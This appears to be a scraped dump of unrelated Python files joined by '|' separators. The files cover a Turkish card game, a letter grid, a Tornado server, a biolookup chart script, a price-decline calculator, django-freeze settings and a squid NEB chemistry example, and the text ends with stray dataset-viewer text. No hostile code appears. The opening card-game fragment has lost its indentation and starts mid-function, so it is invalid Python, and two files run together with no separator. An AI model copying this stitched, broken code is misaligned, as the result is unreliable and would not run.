cevap_info = str(input("\n\tKart oynama kurallarına gözatmak ister misin?\n\tKurallara bakmak için <e>, geçmek için <h> yaz\n\t")).lower()
cevap_info2 = cevap_info.lstrip("<")
cevap_info3 = cevap_info2.rstrip(">")
if cevap_info == "e":
print("Bir kartı oynayabilmen için şu 3 koşuldan en az birini sağlamassı lazım:\n\t_ kartın değeri, ortanın değeriyle aynı\n\t_ kartın şekli, ortanın şekliyle aynı\n\t_ vale (ortanın değeri ya da şeklinden bağımsız, her an oynanabilir\n\t)")
def hamle_sec_user_ng7(self,cards_7):
global oyun_raporu
kontrol1 = 0
while kontrol1 < 1:
time.sleep(1)
print("\n\tElindeki kartlar:\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\tElindeki kartlar:\n\t{}\n".format([k.name for k in self.oyuncu.cards])
cevap_hamle_sec = str(input("\n\tHangi kartı oynamak istersin?\n\tgeri dönmek istiyorsan <geri> yaz\n\t")).lower()
oyun_raporu += "\n\toynanmak istenen kart: {}\n".format(cevap_hamle_sec)
for card in cards_7:
if card.name == cevap_hamle_sec:
hamle = card
kontrol1 = 1
return hamle
if cevap_hamle_sec == "geri":
return 0
else:
print("\n\tOynayabileceğin bir kartı yazmadın")
oyun_raporu += "\n\tOynayabileceğin bir kartı yazmadın\n"
time.sleep(1)
print("\n\tEn son {} oynandı".format(orta.ortadaki_kart.name))
oyun_raporu += "\n\tEn son {} oynandı\n".format(orta.ortadaki_kart.name)
time.sleep(1)
print("\n\tEğer elinde 7'li varsa, onu oynayabilirsin")
oyun_raporu += "\n\tEğer elinde 7'li varsa, onu oynayabilirsin\n"
time.sleep(1)
print("\n\tYoksa, kart çekmek zorundasın")
oyun_raporu += "\n\tYoksa, kart çekmek zorundasın"
time.sleep(1)
    def kart_oyna_user_ng(self,card_instance):
        """Play ``card_instance`` from the human player's hand.

        For a jack ("vale") the player is also asked for the new suit, which
        is stored in the global ``secim``, and a fresh ``Orta`` is built from
        the played card. The card is removed from the hand, the GUI is
        updated, and progress text is appended to the global ``oyun_raporu``.
        """
        global oyun_raporu
        if card_instance.value == "vale":
            time.sleep(1)
            cevap_vale = str(input("\n\tOrta ne olsun istersin?\n\t<kupa/karo/maça/sinek>\n\t")).lower()
            global secim
            secim = cevap_vale
            global orta
            # NOTE(review): only a jack replaces the global middle pile here;
            # presumably non-jack plays update ``orta`` elsewhere — confirm.
            orta = Orta(card_instance)
        # Update the GUI and remove the played card from the hand.
        window.gui_kartoyna_np(card_instance)
        self.oyuncu.cards.remove(card_instance)
        window.gui_el_goster(self.oyuncu)
        time.sleep(1)
        print("\n\t{} oynadın".format(card_instance.name))
        oyun_raporu += "\n\t{} oynadın\n".format(card_instance.name)
        time.sleep(1)
        oyun_raporu += "\n\tElindekiler\n\t{}\n".format([k.name for k in self.oyuncu.cards])
        oyun_raporu += "\nortadaki kart sayısı: {}\n".format(len(orta.ortada))
        if card_instance.value == "vale":
            # Report the suit chosen via the jack.
            print("valeden dolayı değişen orta: {}".format(secim))
            oyun_raporu += "valeden dolayı değişen orta: {}\n".format(secim)
        time.sleep(1)
|
from string import ascii_uppercase
from random import choice
def check():
    """Trivial health-check hook; always reports success as 1."""
    return 1
def make_grid(width, height):
    """Build a ``height`` x ``width`` grid.

    Returns a dict mapping each ``(row, col)`` pair to a randomly chosen
    uppercase ASCII letter.
    """
    grid = {}
    for row in range(height):
        for col in range(width):
            grid[(row, col)] = choice(ascii_uppercase)
    return grid
|
import os
import logging
import tornado.ioloop
import tornado.web
import tornado.log
log = logging.getLogger('dorthy.server')
def listen(routes, port=None):
    """Start a Tornado HTTP server for ``routes`` and block forever.

    If ``port`` is falsy, fall back to the ``PORT`` environment variable,
    then to 8899. Never returns (starts the IOLoop).
    """
    if not port:
        try:
            # Environment variables are strings; coerce so the server gets
            # an integer port (and bad values fall back cleanly).
            port = int(os.environ['PORT'])
        except (KeyError, ValueError):
            port = 8899
    app = tornado.web.Application(routes.routes)
    # Lazy %-style args: formatting happens only if the record is emitted.
    log.info('Starting tornado server on 127.0.0.1:%s', port)
    app.listen(port)
    tornado.ioloop.IOLoop.instance().start()
|
# -*- coding: utf-8 -*-
"""Generate charts for the summary section of the biolookup service."""
import pathlib
import bioregistry
import matplotlib.pyplot as plt
from matplotlib_venn import venn2
from biolookup import backends
HERE = pathlib.Path(__file__).parent.resolve()
STATIC = HERE.joinpath("static")
def main():
    """Generate charts for the biolookup app."""
    # Compare prefixes that have names in the backend against the full
    # Bioregistry, and render the overlap as a Venn diagram.
    backend = backends.get_backend(sql=True)
    covered_prefixes = set(backend.summarize_names())
    registry_prefixes = set(bioregistry.read_registry())
    figure, axis = plt.subplots()
    venn2(
        [covered_prefixes, registry_prefixes],
        ["Biolookup", "Bioregistry"],
        ax=axis,
    )
    figure.savefig(STATIC.joinpath("coverage.svg"))
    plt.close(figure)


if __name__ == "__main__":
    main()
|
'''
Created on Oct 11, 2015
@author: Zhongyi Yan
'''
import math
import os
def CalPrice(p, a, b, c, d, k):
    """Return the simulated price series of length ``k``.

    Price at step ``i`` (1-based) is ``p * (sin(a*i + b) + cos(c*i + d) + 2)``,
    which is always non-negative for positive ``p``.
    """
    return [p * (math.sin(a * i + b) + math.cos(c * i + d) + 2)
            for i in range(1, k + 1)]
def MaxDec(p):
    """Return the largest peak-to-trough decline in the price list ``p``.

    Scans left to right, tracking the running maximum seen so far and the
    biggest drop from that maximum to any later price. Returns 0 for an
    empty list (or one with no decline).
    """
    biggest_drop = 0
    running_peak = 0
    for price in p:
        drop = running_peak - price
        if drop > biggest_drop:
            biggest_drop = drop
        if price > running_peak:
            running_peak = price
    return biggest_drop
if os.path.exists('input.dat'):
    # Each line of input.dat holds six integers: p a b c d k.
    # Compute the price series and write the largest decline per line.
    # ``with`` guarantees both files are closed (they previously never were).
    with open('input.dat', 'r') as fileIn, open('output.dat', 'w+') as fileOut:
        for line in fileIn:
            if not line.strip():
                continue  # tolerate blank lines
            # split() (no argument) is robust to repeated/trailing whitespace.
            constantP, constantA, constantB, constantC, constantD, valK = map(int, line.split())
            # Validate the problem's stated ranges.
            done = (
                1 <= constantP <= 1000
                and 0 <= constantA <= 1000
                and 0 <= constantB <= 1000
                and 0 <= constantC <= 1000
                and 0 <= constantD <= 1000
                and 1 <= valK <= 1000000
            )
            if not done:
                # BUGFIX: previously the result was still computed and written
                # for invalid lines; now they are reported and skipped.
                print("invalid constant or variable")
                continue
            price = CalPrice( constantP, constantA, constantB, constantC, constantD, valK )
            fileOut.write('The largest decline is {0:.6f} \n ' .format(MaxDec(price)))
else:
    print("input file doesn't exist")
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ImproperlyConfigured
import os
# Root directory the frozen static site is written into (must be absolute).
FREEZE_ROOT = getattr(settings, 'FREEZE_ROOT', os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../freeze/')) )
if not os.path.isabs(FREEZE_ROOT):
    raise ImproperlyConfigured('settings.FREEZE_ROOT should be an absolute path')
# NOTE(review): this check rejects MEDIA_ROOT/STATIC_ROOT located *inside*
# FREEZE_ROOT, while the message reads the other way around — confirm intent.
if settings.MEDIA_ROOT.startswith(FREEZE_ROOT) or settings.STATIC_ROOT.startswith(FREEZE_ROOT):
    raise ImproperlyConfigured('settings.FREEZE_ROOT cannot be a subdirectory of MEDIA_ROOT or STATIC_ROOT')
FREEZE_MEDIA_ROOT = settings.MEDIA_ROOT
FREEZE_MEDIA_URL = settings.MEDIA_URL
FREEZE_STATIC_ROOT = settings.STATIC_ROOT
FREEZE_STATIC_URL = settings.STATIC_URL
FREEZE_USE_HTTPS = getattr(settings, 'FREEZE_USE_HTTPS', False)
FREEZE_PROTOCOL = 'https://' if FREEZE_USE_HTTPS else 'http://'
FREEZE_SITE_URL = getattr(settings, 'FREEZE_SITE_URL', None)
if FREEZE_SITE_URL is None:
    # handled this way to remove DB dependency unless strictly needed. If
    # FREEZE_SITE_URL is set then collectstatic can be called without needing
    # a db setup, which is useful for build servers
    FREEZE_SITE_URL = '%s%s' % (FREEZE_PROTOCOL, Site.objects.get_current().domain,)
FREEZE_BASE_URL = getattr(settings, 'FREEZE_BASE_URL', None)
if FREEZE_BASE_URL:
    if FREEZE_BASE_URL.startswith(('/', 'http')):
        # Normalize to a trailing slash.
        if not FREEZE_BASE_URL.endswith('/'):
            FREEZE_BASE_URL += '/'
    else:
        raise ImproperlyConfigured('settings.FREEZE_BASE_URL should start with \'/\' or \'http\' or be an empty string')
FREEZE_RELATIVE_URLS = getattr(settings, 'FREEZE_RELATIVE_URLS', False)
if FREEZE_RELATIVE_URLS and FREEZE_BASE_URL is not None:
    raise ImproperlyConfigured('settings.FREEZE_RELATIVE_URLS cannot be set to True if FREEZE_BASE_URL is specified')
FREEZE_LOCAL_URLS = getattr(settings, 'FREEZE_LOCAL_URLS', False)
if FREEZE_LOCAL_URLS and not FREEZE_RELATIVE_URLS:
    raise ImproperlyConfigured('settings.FREEZE_LOCAL_URLS cannot be set to True if FREEZE_RELATIVE_URLS is set to False')
FREEZE_FOLLOW_SITEMAP_URLS = getattr(settings, 'FREEZE_FOLLOW_SITEMAP_URLS', True)
FREEZE_FOLLOW_HTML_URLS = getattr(settings, 'FREEZE_FOLLOW_HTML_URLS', True)
FREEZE_REPORT_INVALID_URLS = getattr(settings, 'FREEZE_REPORT_INVALID_URLS', False)
FREEZE_REPORT_INVALID_URLS_SUBJECT = getattr(settings, 'FREEZE_REPORT_INVALID_URLS_SUBJECT', '[freeze] invalid urls')
FREEZE_INCLUDE_MEDIA = getattr(settings, 'FREEZE_INCLUDE_MEDIA', True)
FREEZE_INCLUDE_STATIC = getattr(settings, 'FREEZE_INCLUDE_STATIC', True)
FREEZE_ZIP_ALL = getattr(settings, 'FREEZE_ZIP_ALL', False)
FREEZE_ZIP_NAME = getattr(settings, 'FREEZE_ZIP_NAME', 'freeze')
# BUGFIX: the previous guard (len >= 4) skipped appending '.zip' to names
# shorter than four characters; just ensure the suffix is present.
if not FREEZE_ZIP_NAME.lower().endswith('.zip'):
    FREEZE_ZIP_NAME += '.zip'
FREEZE_ZIP_PATH = os.path.abspath(os.path.join(FREEZE_ROOT, FREEZE_ZIP_NAME))
FREEZE_REQUEST_HEADERS = getattr(settings, 'FREEZE_REQUEST_HEADERS', {'user-agent': 'django-freeze'})
|
from gym.envs.classic_control import rendering
import pyglet
class Text(rendering.Geom):
    """A renderable text label geometry for the classic-control viewer."""

    def __init__(self, text, size=14):
        rendering.Geom.__init__(self)
        self.size = size
        self.set_text(text)

    def set_text(self, text):
        # Rebuild the pyglet label whenever the text changes.
        self.text = pyglet.text.Label(text, 'sans-serif', self.size)

    def render1(self):
        # Called by the Geom render machinery with transforms applied.
        self.text.draw()
from squid import orca
from squid import files
from squid import geometry
from squid.calcs import NEB
from squid import structures
if __name__ == "__main__":
    # In this example we generate the full CNH-HCN isomerization using only
    # squid: build a rough guess, optimize the endpoints in DFT, smooth the
    # frames, run NEB, and finally converge the transition state.
    # Step 1 - Generate the bad initial guess
    print("Step 1 - Generate the bad initial guess...")
    # Hydrogen positions tracing a rough arc from one end of the C-N axis
    # to the other; C and N stay fixed in every frame.
    H_coords = [(2, 0), (2, 0.5), (1, 1), (0, 1), (-1, 0.5), (-1, 0)]
    CNH_frames = [[
        structures.Atom("C", 0, 0, 0),
        structures.Atom("N", 1, 0, 0),
        structures.Atom("H", x, y, 0)]
        for x, y in H_coords
    ]
    # Save initial frames
    files.write_xyz(CNH_frames, "bad_guess.xyz")
    # Step 2 - Optimize the two endpoint geometries with HF-3c
    print("Step 2 - Optimize endpoints...")
    frame_start_job = orca.job(
        "frame_start", "! HF-3c Opt", atoms=CNH_frames[0], queue=None
    )
    frame_last_job = orca.job(
        "frame_last", "! HF-3c Opt", atoms=CNH_frames[-1], queue=None
    )
    # Block until both optimizations finish.
    frame_start_job.wait()
    frame_last_job.wait()
    # Step 3 - Read in the final coordinates, and update the band
    print("Step 3 - Store better endpoints...")
    CNH_frames[0] = orca.read("frame_start").atoms
    CNH_frames[-1] = orca.read("frame_last").atoms
    # Save better endpoints
    files.write_xyz(CNH_frames, "better_guess.xyz")
    # Step 4 - Smooth out the band
    # NOTE(review): N_frames=8 here, though an earlier revision described
    # "10 frames" — confirm the intended frame count.
    print("Step 4 - Smooth out the band...")
    CNH_frames = geometry.smooth_xyz(
        CNH_frames, N_frames=8,
        use_procrustes=True
    )
    # Save smoothed band
    files.write_xyz(CNH_frames, "smoothed_guess.xyz")
    # Step 5 - Run (climbing-image) NEB; keep the last iteration's band
    print("Step 5 - Run NEB...")
    neb_handle = NEB(
        "CNH", CNH_frames, "! HF-3c",
        nprocs=1, queue=None, ci_neb=True)
    CNH_frames = neb_handle.optimize()[-1]
    # Save final band
    files.write_xyz(CNH_frames, "final.xyz")
    # Step 6 - Isolate the peak frame, and converge to the transition state
    print("Step 6 - Calculating Transition State...")
    ts_job = orca.job(
        "CNH_TS", "! HF-3c OptTS NumFreq",
        extra_section='''
%geom
    Calc_Hess true
    NumHess true
    Recalc_Hess 5
    end
''',
        atoms=CNH_frames[neb_handle.highest_energy_frame_index], queue=None
    )
    ts_job.wait()
    # A true first-order saddle point has exactly one imaginary (negative)
    # vibrational frequency.
    data = orca.read("CNH_TS")
    vib_freq = data.vibfreq
    if sum([int(v < 0) for v in vib_freq]) == 1:
        print("  Isolated a transition state with exactly 1 negative vibfreq.")
        print("  Saving it to CNH_ts.xyz")
        files.write_xyz(data.atoms, "CNH_ts.xyz")
    else:
        print("FAILED!")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.